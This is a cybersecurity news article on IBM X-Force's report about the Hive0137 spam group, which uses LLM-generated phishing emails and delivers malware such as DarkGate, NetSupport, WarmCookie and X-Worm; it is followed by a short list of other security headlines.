Hive0137 email spammer is now using AI to bolster its phishing campaigns

Hive0137 email spammer is now using AI to bolster its phishing campaigns

Hive0137 threat actor has been observed leveraging Large Language Models (LLMs) to generate phishing emails that look more authentic and are harder to detect using traditional signature-based methods.

The new behavior was seen by the IBM X-Force threat intelligence team in an Italian campaign distributing Dave-crypted X-Worm. Additionally, Hive0137 appears to use Generative AI for creating its tooling, the team noted.

Hive0137 is a highly active email spammer distributing malware used for initial access in ransomware attacks. Active since at least October 2023, the group has been distributing various malware payloads such as DarkGate, NetSupport, T34-Loader, and Pikabot using what IBM X-Force describes as the “most complex infection chain,” which often involve the use of advanced crypters. These crypters indicate a possible relationship with former members of ITG23, also known as the Conti/Trickbot group. The connection suggests that Hive0137 may be collaborating with or has absorbed members from ITG23.

Following a large-scale law enforcement effort known as “Operation Endgame,” which targeted several malware botnets, including IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot, X-Force observed Hive0137 introducing a new backdoor known as WarmCookie. The threat actor has also changed its payload delivery method. The group started using Microsoft Project files with embedded macros to download NetSupport payloads.

Hive0137's campaigns have delivered emails containing malicious PDF attachments or URLs leading to malware like DarkGate and NetSupport. The group has been observed using new loaders such as T34-Loader, with overlapping tactics noted in Proofpoint's TA571 cluster.

In early 2024, Hive0137 expanded its techniques, experimenting with new attachment types, such as Excel files containing malicious URLs. These campaigns typically led to the download of VBS or JavaScript files, which then deployed the final payload, often the DarkGate malware.

In mid-June, Hive0137 employed HTML files to copy malicious PowerShell code into users' clipboards, prompting execution and downloading the WarmCookie backdoor.

In a July 2024 campaign, Hive0137 targeted Italian-speaking victims using ZIP archives containing .URL files linked to Dave-crypted X-Worm.

"Being one of the most active malware distributors, Hive0137 demonstrates a willingness to explore new payloads and technologies such as GenAI," the researchers said. "They have quickly moved onto the same level as other high-profile distributors such as TA577, and will likely be responsible for future phishing campaigns, facilitating initial access for ransomware affiliates."

Back to the list

Latest Posts

Cyber Security Week in Review: May 30, 2025

Cyber Security Week in Review: May 30, 2025

In brief: 9,000 ASUS routers hacked in a botnet campaign, a new Russian state-backed APT discovered, and more.
30 May 2025
Chinese state-backed hackers using Google Calendar for cyberespionage

Chinese state-backed hackers using Google Calendar for cyberespionage

The attack chain begins with spear-phishing emails containing a ZIP archive hosted on the compromised site.
29 May 2025
Over 9,000 ASUS routers compromised in nation-state-like AyySSHush botnet campaign

Over 9,000 ASUS routers compromised in nation-state-like AyySSHush botnet campaign

The attackers reportedly use a mix of brute-force login attempts, authentication bypasses, and old bugs to gain persistent access.
29 May 2025